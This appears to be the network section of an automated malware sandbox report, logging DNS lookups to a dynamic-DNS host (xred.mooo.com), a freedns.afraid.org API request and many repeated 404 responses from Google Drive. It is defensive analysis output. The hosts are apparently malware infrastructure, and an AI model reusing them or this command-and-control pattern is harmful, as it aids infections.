                                Source: global traffic | HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 | User-Agent: MyApp | Host: freedns.afraid.org | Cache-Control: no-cache
                                Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
                                Source: global traffic | DNS traffic detected: DNS query: docs.google.com
                                Source: global traffic | DNS traffic detected: DNS query: xred.mooo.com
                                Source: global traffic | DNS traffic detected: DNS query: freedns.afraid.org
                                Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | X-GUploader-UploadID: AFiumC7fA_f1yz2G6qMJnHHHlZpEROzFDu7u_4Gs0Mi34Cy03ddzgbGkvRLUkBSIZY2_2FH1 | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Mon, 30 Dec 2024 10:48:06 GMT | P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." | Content-Security-Policy: script-src 'report-sample' 'nonce-dnqnA7X8CQ1kQ9FIB-K8Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Cross-Origin-Opener-Policy: same-origin | Content-Length: 1652 | Server: UploadServer | Set-Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg; expires=Tue, 01-Jul-2025 10:48:06 GMT; path=/; domain=.google.com; HttpOnly | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4lQun2pwI-_fZ7VQBA-5boXVt7qC0bOuHMkaQrEVZ_fhDewdBV2uVav1Q-z30CcrA_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:22 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-x4mOr7Ug1u9nrwJskkTDdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC57s5J1nJCb35vBn4m1xPQBBL1wzk6KlKSRAB7caIZrZZJJCWeuwYe24DCOkMWLvEPqOaBVO9EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:23 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Nxh5i3nJ4tetKMuZ5T9-Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC59Sdkyv2ux1gBeG63q0xc-WTy238cTxQUab6Z1Yjz6x15FkOUdNHk_3iqM1xkLBwOghMc_-08Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:24 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-DceZHgr2ScX6ZlEZnGgEtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4D-GG-RPf1eawJzoz9UdypHlaJREhrExNkmAj3txLz2p8dIWu2IY-E7haAGDNfF1YYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:24 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-U5vZzP7wGK2O9taR9Pi_rQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4iHpJ_FutwIKcUQSjSpPUTvSXHL81hvbkq4dBjDM8NZu_B5tOxBc1FBj5XjN2lCPMSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-m-0ljyCkE6a4MskDahHYVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC45BIOhOERzdvA9VjdHpPsxsXEI7YV1viQZGBAOD4oB752YF6dBLrY04yw2ATVCZIAxWMW9IYkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:25 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-p3s5diROrRGM6ULqVv9B4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4b0UZLAT798HZAbBJTykZ34GBErku33TJ6pcvb4JZS4b6-nhX5_JJaw3Rd-brlAk5d5D8uHWoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Oji1xqDDsPCoXnltD1_51A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4IOpGA8Ao2P20TgHDrxvot3lOI0h_vJjeYmv8bO54H1CdIiT8NreImJfuZj5BAo8-qContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:28 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-4TSUNT34mCQ5ghWjHmM4dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WOSPWpM7pzX4ZiD-mZe-mvakOBU98m260O6fpv8xExiqp48-Yxc63hoqZnbVEZkzdContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:29 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-tvbMUvniZ0jel4GCV24lRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ps02OvxWtNMMAe_BEi2q9G3wM9ThvNxUEqVFhm83fiFu-W0kBcPjdWKnJpZdRq44hContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-_XcyCMOs4X9GLi9bHjGAzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4MK3E-AwcJulIXQ0UZgkN809tKNDavKOseqoznTaoV_kn5cuKzsLmzS7f5khnxrfxAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Kyof0GHRxxHTaM6xEMabOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5zNxRd2FZz7q2nYkKsSu9LoSiiOMsDs0Qn_5xLE6tLAXIcEgi9gQvjY0vhm9gEDcHtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:32 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2WIm3q_OXsY1STAuL6t_gA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ZJtHK0kXHSAbONHcd2Aj41th3nrdAk60F-GSqsveAVAxMfvRqVLbTQ0xWjMDiEUBf1UymHYkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:32 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-AxGsGedNodCh4Yi30VNLCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4R2GpV991AhRbKqc6ICKlzZU2qexi5lCWOHYFd0eXG9PX3SEhTbwgkhRK8LpWGE5tXt89FTf4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:33 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-7JtuJjg9kPR51QbTWyN2Ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7x5jloO1fPXoo9HMImHXRcaftSeG47HoDh46372HnTzuleZrj_ele8bFIjbnWdEssNeA3jXq0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_fNPlzqxrP4WsNjS6AsQiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5W6YnuABOaMnzcH905lH1YuLU8TSDgxUapWGv2OEv6pcr09ijtmnsMS5Fb_0ersk9PContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EZFpycfDYrroUTPpizE3Ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC75v8hsAMmHLV5cMDrZEPqXt3-JFWhA7z2XQXISy9Psi0regh-UrBla2ovfTX7WbA9X9etom9EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:34 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-a2n-I9hjO6niavD8rIUFqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7fI9Y1fM-Z4_V2C6mkWRbnWPDz9pi3vcBftr46m-A4dwB9cjIzT1kUt9BHzyihhGCISH70x2oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:36 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-6Tie74mkdyyaZKr5qjkeGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
